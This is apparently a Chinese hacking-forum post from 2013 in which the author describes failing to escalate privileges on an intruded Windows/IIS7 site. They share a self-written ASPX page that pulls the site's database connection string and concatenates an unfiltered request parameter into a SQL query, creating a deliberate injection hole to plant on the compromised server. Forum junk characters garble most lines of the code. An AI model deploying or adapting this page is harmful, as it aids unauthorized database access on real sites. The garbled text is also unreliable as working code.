昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。9 J2 Z9 J/ b( ?5 H! e5 G
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
@6 y, J4 P7 c! G' e代码量不多,自己写个拉倒了。烦死了。
i- _& h8 r! [ r6 Y/ Q
& D' q4 Q& `) w$ E' N, b
* W# B( o' d8 N. S/ Y1 C: U<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
8 g& I+ A; \. o' B; v% @<html xmlns="http://www.w3.org/1999/xhtml">
E8 z/ S8 |( h<head runat="server">. @6 L/ A" @5 z/ [. k
<title>暗影aspx构造注射专用页面</title>0 B, k9 g1 a- z2 Z; f
</head>! N- O! ]( g1 S# _& p# i9 g6 T: t) s; z
<body>
# @0 A2 S$ D7 c) N) W7 V <form id="form1" runat="server"> R6 ?5 [# K2 }3 R c& M
<div>5 p9 N! w. ^% |' s% C2 [, @( c
<script language="c#" runat="server">2 X) k+ I. _( s u
/ [0 b* l6 x; i void page_init(object sender, EventArgs e) C3 @8 Q1 B5 k' @+ [( p, d0 y
{
' n2 g7 U2 M" R6 D* s- s, U' ] ) C+ o% J: u7 M9 ]. o+ l9 j. O1 Q
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();5 u$ a8 n6 N8 Z' J+ K) F
4 g1 |7 ^0 ?! y. [2 w1 B- t" r conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();( ?9 e8 C) ]+ f# \$ c
conn.Open();
% j1 ^5 s" b5 D% I$ M 7 @* X, B4 n) w
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
0 k0 O( r( F' k. b0 z8 y
; T3 S8 h, I- I3 R/ J0 E System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
+ h% K$ [' ]! B2 k4 B j int x = command.ExecuteNonQuery();5 z. `. N7 j7 r
Response.Write(i+"\n");: T- ?" T6 `1 V4 D4 q; k1 V! ?& D
Response.Write(x);8 O# I+ W. q# k% p3 T& X
conn.Close();
/ E' L) Y0 {) M; I, C' P+ n- n }
9 H4 E8 T) ?, ]. q. q$ L8 [+ |
. A6 j, S7 n; A- v- v1 J3 C5 S2 Z </script>
% R6 V1 ?" w8 t* j </div>: h; t8 Y) v- o+ K
</form>
+ m% W; _% ^+ f/ Y7 y</body>
1 ?( q h, x+ C! [- s2 a$ c+ {</html>" J) k2 o2 }2 Y: _
|
发表于 2013-3-20 21:32:01
收藏
支持
反对